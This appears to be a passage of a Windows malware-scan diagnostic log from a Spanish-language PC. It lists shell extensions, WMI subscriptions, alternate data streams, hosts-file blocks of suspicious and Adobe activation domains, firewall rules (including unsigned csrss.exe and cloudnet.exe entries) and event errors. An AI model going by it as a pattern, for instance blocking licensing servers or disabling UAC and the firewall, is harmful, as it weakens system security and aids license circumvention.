ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => E:\Archivos de Programa\Notepad++\NppShell_06.dll [2019-01-27] (Notepad++ -> )
ContextMenuHandlers1: [BoxDesktop] -> {2BF1BC5C-AADF-4AB4-BA2E-1BC880371AE8} => C:\Program Files\Box Sync\BoxContextMenuHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ContextMenuHandlers1-x32: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} => E:\Archivos de Programa\Nero 7\Nero CoverDesigner\CoverEdExtension.dll [2007-06-28] (Nero AG -> Nero AG)
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-06-27] (Google LLC -> Google)
ContextMenuHandlers1: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => E:\Archivos de Programa\Tools\Mp3tag\Mp3tagShell64.dll [2012-12-22] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [NP8ShellExtension] -> {9C4B85B8-956C-49BF-9BA5-101384E562B2} => E:\Pro11\NPSHEL~1.DLL [2016-12-08] (Nitro Software, Inc. -> Nitro PDF)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-01-09] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-01-09] () [File not signed]
ContextMenuHandlers2: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => E:\Archivos de Programa\Tools\Mp3tag\Mp3tagShell64.dll [2012-12-22] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => E:\Archivos de Programa\UltraISO\isoshl64.dll [2009-10-22] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ContextMenuHandlers4: [BoxDesktop] -> {2BF1BC5C-AADF-4AB4-BA2E-1BC880371AE8} => C:\Program Files\Box Sync\BoxContextMenuHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-06-27] (Google LLC -> Google)
ContextMenuHandlers4: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => E:\Archivos de Programa\Tools\Mp3tag\Mp3tagShell64.dll [2012-12-22] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-04-08] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers4: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => E:\Archivos de Programa\UltraISO\isoshl64.dll [2009-10-22] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-01-09] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-01-09] () [File not signed]
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2013-08-30] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers6: [Kaspersky Anti-Virus] -> {dd230880-495a-11d1-b064-008048ec2fc5} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\shellex.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
ContextMenuHandlers6: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-04-08] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => E:\Archivos de Programa\UltraISO\isoshl64.dll [2009-10-22] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-01-09] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-01-09] () [File not signed]

==================== Codecs (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [VIDC.CFHD] => C:\Windows\system32\CFHD.dll [1443328 2013-09-05] (CineForm Inc.) [File not signed]
HKLM\...\Drivers32: [VIDC.FMVC] => C:\Windows\SysWOW64\fmcodec.dll [77824 2008-08-18] (Fox Magic Software) [File not signed]
HKLM\...\Drivers32: [VIDC.CFHD] => C:\Windows\SysWOW64\CFHD.DLL [1474560 2013-09-05] (CineForm Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\SysWOW64\vp6vfw.dll [447752 2008-09-05] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\SysWOW64\vp6vfw.dll [447752 2008-09-05] (Electronic Arts -> On2.com)

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

Shortcut: C:\Users\MrEidrian\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.htm
Shortcut: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Tools\Video\Anim-FX\website.lnk -> hxxp://www.anim-fx.com

ShortcutWithArgument: C:\Users\MrEidrian\Desktop\Persona 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\MrEidrian\Desktop\SEO - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"

==================== Loaded Modules (Whitelisted) ==============

2012-06-23 12:32 - 2012-01-09 19:44 - 000193536 _____ () [File not signed] C:\Program Files\WinRAR\rarext.dll
2010-01-02 16:42 - 2010-01-02 16:42 - 000098304 _____ () [File not signed] E:\Archivos de Programa\FileZilla FTP Client\fzshellext_64.dll
2013-08-30 19:37 - 2013-08-30 19:37 - 000897024 _____ (Advanced Micro Devices, Inc.) [File not signed] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll
2013-08-30 19:37 - 2013-08-30 19:37 - 000004608 _____ (Advanced Micro Devices, Inc.) [File not signed] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiamesp.dll
2013-06-07 21:20 - 2013-06-07 21:20 - 000010752 _____ (Box, Inc.) [File not signed] C:\Program Files\Box Sync\BoxCopyHookHandler.dll
2013-06-07 21:20 - 2013-06-07 21:20 - 000009216 _____ (Box, Inc.) [File not signed] C:\Program Files\Box Sync\BoxIconOverlayHandler.dll
2013-06-07 21:20 - 2013-06-07 21:20 - 000091136 _____ (Box, Inc.) [File not signed] C:\Program Files\Box Sync\BoxUtils.dll
2012-09-23 18:25 - 2010-09-23 23:02 - 000185856 _____ (Martin Prikryl) [File not signed] E:\Archivos de Programa\WinSCP\DragExt64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:nlsPreferences [898]
AlternateDataStreams: C:\ProgramData\Microsoft:fJFUreezaO2K2ZYH3ywW6T3Dvbx [2608]
AlternateDataStreams: C:\ProgramData\Microsoft:IMOG7FwadszVkLuwNcFnh [2380]
AlternateDataStreams: C:\ProgramData\Microsoft:O0QN96UemdV4kzQFhIX [2430]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [290]
AlternateDataStreams: C:\ProgramData\TEMP:1AAB2E68 [183]
AlternateDataStreams: C:\ProgramData\TEMP:4BF2F6B5 [388]
AlternateDataStreams: C:\Users\MrEidrian\AppData\Local\Archivos temporales de Internet:atSLiHJlFjQbclYyr5KCL0i [2340]
AlternateDataStreams: C:\Users\MrEidrian\AppData\Local\desktop.ini:3a96398c0f384e4adf5faa1736aeaf96 [802]
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo [122]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2019-09-01 08:39 - 000002252 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1    localhost
127.0.0.1 lmlicenses.wip4.adobe.com
127.0.0.1 lm.licenses.adobe.com
127.0.0.1 na1r.services.adobe.com
127.0.0.1 hlrcv.stage.adobe.com
127.0.0.1 practivate.adobe.com 
127.0.0.1 activate.adobe.com
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 sharefolder.online
127.0.0.1 telechargini.com
127.0.0.1 fffffk.xyz
127.0.0.1 smarttrackk.xyz
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 sharefolder.online
127.0.0.1 telechargini.com
127.0.0.1 fffffk.xyz
127.0.0.1 smarttrackk.xyz

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files\Calibre2\;C:\Program Files (x86)\CineForm\Tools;E:\Archivos de Programa\GoPro\GoPro\Tools;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;E:\Archivos de Programa\QuickTime\QTSystem\
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: EADM => "C:\Program Files (x86)\Origin\Origin.exe" -AutoStart
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Steam => "E:\Juegos\Steam\steam.exe" -silent

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{735EE0B3-0F83-4638-92C0-16790D863D8D}C:\program files (x86)\winamp\winamp.exe] => (Allow) C:\program files (x86)\winamp\winamp.exe (Nullsoft Inc. -> Nullsoft, Inc.)
FirewallRules: [UDP Query User{26900D2B-5789-4E38-AA20-939C8A9505F6}C:\program files (x86)\winamp\winamp.exe] => (Allow) C:\program files (x86)\winamp\winamp.exe (Nullsoft Inc. -> Nullsoft, Inc.)
FirewallRules: [{41B0B5E3-6601-4BAB-8556-986F96A7DAFC}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe (Even Balance, Inc. -> )
FirewallRules: [{78D2C10A-8BF6-4F5F-8F12-EA6419D863C6}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe (Even Balance, Inc. -> )
FirewallRules: [{A931A49C-8B82-4FF7-A937-8F098C877F48}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe (Even Balance, Inc. -> )
FirewallRules: [{BC20DF00-D544-4F9A-A3B0-42175542DD8A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe (Even Balance, Inc. -> )
FirewallRules: [{7FE7C50A-054E-41BC-84C3-09493BDDBFAE}] => (Allow) E:\Games\Diablo III\Diablo III.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [{30A3E766-15EB-4D23-B60C-0B4285A788DB}] => (Allow) E:\Games\Diablo III\Diablo III.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [{997A74FB-F9CD-4B9A-8C41-59EB68D4D71D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CB974C01-942E-4B4F-B627-02669D5B7B5F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{097C1488-A910-463E-9447-417F27C16779}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{83F40611-5D0D-4C93-87B9-08C46804EA35}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1D28F301-0F1C-43B7-8DC0-447A651D3DDC}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation) [File not signed]
FirewallRules: [{A7173B06-64D4-402F-8A0B-87BB3914DEA2}] => (Allow) LPort=2869
FirewallRules: [{80D3A671-2D03-4061-9703-5B73902E6346}] => (Allow) LPort=1900
FirewallRules: [{F1473C39-2AF2-4C0B-8D3F-84ABB885B1E3}] => (Allow) E:\Archivos de Programa\Skype\Phone\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{08C17F78-9D76-4703-A500-4E1F37F4DCE9}] => (Allow) E:\Games\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{47E18C8D-AC88-4CA4-980F-443D59CBA8EA}] => (Allow) E:\Games\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{F0F8E358-0889-43A6-8633-28DB13D5626E}] => (Allow) E:\Games\Steam\SteamApps\common\XCom-Enemy-Unknown\Binaries\Win32\XComGame.exe (Valve Corp. -> Firaxis Games) [File not signed]
FirewallRules: [{FEBE1033-C678-4FD2-B037-7098B2EBAFCC}] => (Allow) E:\Games\Steam\SteamApps\common\XCom-Enemy-Unknown\Binaries\Win32\XComGame.exe (Valve Corp. -> Firaxis Games) [File not signed]
FirewallRules: [{7BE05399-E9E3-492A-84E1-10DC45DB6977}] => (Allow) C:\Program Files (x86)\Pando Networks\Media Booster\PMB.exe (Pando Networks, Inc. -> )
FirewallRules: [{FC74ADC6-B93E-48D9-BDD0-D30CFB9710C4}] => (Allow) C:\Program Files (x86)\Pando Networks\Media Booster\PMB.exe (Pando Networks, Inc. -> )
FirewallRules: [{3998315C-351E-4344-94D8-5FB9B6FD6D34}] => (Allow) C:\Program Files (x86)\Pando Networks\Media Booster\PMB.exe (Pando Networks, Inc. -> )
FirewallRules: [{762362F2-8DE3-4476-9817-27ED57DF4BBF}] => (Allow) C:\Program Files (x86)\Pando Networks\Media Booster\PMB.exe (Pando Networks, Inc. -> )
FirewallRules: [{78859AD4-5835-4EC4-B34A-6B428C8D1A19}] => (Allow) LPort=57747
FirewallRules: [{277DDD17-7B90-4F87-96D7-247CD3E5C748}] => (Allow) LPort=57747
FirewallRules: [{13C4D447-603E-4C31-85E0-AD87E17653BE}] => (Allow) LPort=57747
FirewallRules: [{C9686358-82E0-4F17-9A29-4F7BD17D15D8}] => (Allow) LPort=57747
FirewallRules: [{8E90417F-CC2E-4C6F-BE7C-974CECF15003}] => (Allow) C:\Program Files (x86)\Pando Networks\Media Booster\PMB.exe (Pando Networks, Inc. -> )
FirewallRules: [{B1CEB0F3-013D-45DB-9076-09FBE42F28CE}] => (Allow) C:\Users\MrEidrian\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{16053EF5-F60E-4F54-BB69-7495AE212918}] => (Allow) C:\Users\MrEidrian\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{75A54947-34E9-4CC3-8DC3-9A212F8BB627}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{39DD1A80-658A-4610-B860-ACB241C72779}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{F9098BCF-2078-45A1-B930-AA6B687CB1A8}] => (Allow) E:\Games\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{78D699B6-B986-40FB-8D1A-C206C96383D9}] => (Allow) E:\Games\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{11F992A1-92B4-4974-8BFB-5BFA7B1C96AB}] => (Allow) LPort=5354
FirewallRules: [{B08F1BD6-AD09-4DBD-9A31-8D7838879C1D}] => (Allow) LPort=5354
FirewallRules: [{5275ADEF-E8F7-486B-9F63-642F34402A0A}] => (Allow) LPort=5354
FirewallRules: [{97E694A4-49EE-4DC5-A3B0-176C1E702774}] => (Allow) LPort=5354
FirewallRules: [{39D29784-7A31-4CC5-B16E-82F573FA41D8}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{39E969B2-C3B7-4634-AD28-8BE2E4DB4A38}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{92C96987-1B24-4ED6-B902-4AAE73F1EA72}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4162823B-8EF7-424F-A96F-1E3AD0406407}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{954BCCE6-EA14-4E73-A12F-1D8DAD2A2BCD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{7E65D1B6-2E52-4A3C-9BC1-54565D984BE3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{050D5C15-611A-4213-89B0-671670A8EFDE}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{1ECB0A98-6593-4D31-884F-2F347B790F7F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{71A816E0-94D1-496D-BDE9-02EB24D56F38}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{C2D6A307-2C2A-42AE-A1C3-9A5DD7589E53}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{8FA653DD-461E-4E6F-94A0-0B346C8523FD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{181F5EAD-526B-43B2-A730-55C5D7F30367}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{12339667-8FD9-40C7-B0D2-74BA403DAA44}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{20D914BD-C368-4A0C-9456-EB3E2B4CB454}] => (Allow) E:\Archivos de Programa\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6588581F-D0E5-45F4-AB84-B96E33632494}] => (Allow) C:\Users\MrEidrian\AppData\Local\Yandex\YandexBrowser\Application\browser.exe (YANDEX LLC -> YANDEX LLC)
FirewallRules: [{E9FFC092-FDC3-46DE-9D1B-A7219E6ACA96}] => (Allow) E:\Archivos de Programa\Opera\63.0.3368.53\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{20B9F341-EE09-4598-8EF0-78107FD8A1CB}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{D474C89E-0BBC-49AB-8D44-BDC288633E71}] => (Allow) C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{4BF67BD6-57DB-4B59-8419-3BFD35CC8D42}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{4E614F98-5310-4892-A370-53E9E9BA9218}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7F93FB14-45B5-4EFB-9443-E1CE5607289C}] => (Allow) E:\Archivos de Programa\Opera\63.0.3368.71\opera.exe (Opera Software AS -> Opera Software)

==================== Restore Points =========================

ATTENTION: System Restore is disabled (Total:55.9 GB) (Free:2.75 GB) (5%)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/18/2019 11:57:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.17725, marca de tiempo: 0x4ec49b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0005b223
Id. del proceso con errores: 0x23b0
Hora de inicio de la aplicación con errores: 0x01d585981021227f
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: C:\Windows\SysWOW64\ntdll.dll
Id. del informe: a019db00-f18d-11e9-aa88-6cf049e1b2f6

Error: (10/18/2019 11:56:37 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: Pen_Tablet.dll_unloaded, versión: 0.0.0.0, marca de tiempo: 0x4e694dd7
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x700b32ac
Id. del proceso con errores: 0x23b0
Hora de inicio de la aplicación con errores: 0x01d585981021227f
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: Pen_Tablet.dll
Id. del informe: 92695c3b-f18d-11e9-aa88-6cf049e1b2f6

Error: (10/18/2019 11:39:40 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (09/16/2019 04:55:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (09/14/2019 11:32:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: sechost.dll, versión: 6.1.7600.16385, marca de tiempo: 0x4a5bdb04
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x000114ad
Id. del proceso con errores: 0x2324
Hora de inicio de la aplicación con errores: 0x01d56adefb8ffffa
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: C:\Windows\SysWOW64\sechost.dll
Id. del informe: 978d7503-d6d2-11e9-825a-6cf049e1b2f6

Error: (09/14/2019 11:32:37 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: Pen_Tablet.dll_unloaded, versión: 0.0.0.0, marca de tiempo: 0x4e694dd7
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x74c532ac
Id. del proceso con errores: 0x2324
Hora de inicio de la aplicación con errores: 0x01d56adefb8ffffa
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: Pen_Tablet.dll
Id. del informe: 96104ab6-d6d2-11e9-825a-6cf049e1b2f6

Error: (09/14/2019 11:28:48 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Error al generar el contexto de activación para "E:\Archivos de Programa\Anti-Malware\mbam.exe". Error en el archivo de manifiesto o directiva "E:\Archivos de Programa\Anti-Malware\mbam.exe" en la línea 0.
Sintaxis XML no válida.

Error: (09/14/2019 11:17:35 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Error al generar el contexto de activación para "E:\Archivos de Programa\Anti-Malware\mbam.exe". Error en el archivo de manifiesto o directiva "E:\Archivos de Programa\Anti-Malware\mbam.exe" en la línea 0.
Sintaxis XML no válida.


System errors:
=============
Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio Servicio del iPod se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio NMIndexingService se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio Servicio Bonjour se terminó de manera inesperada. Esto ha sucedido 1 veces.

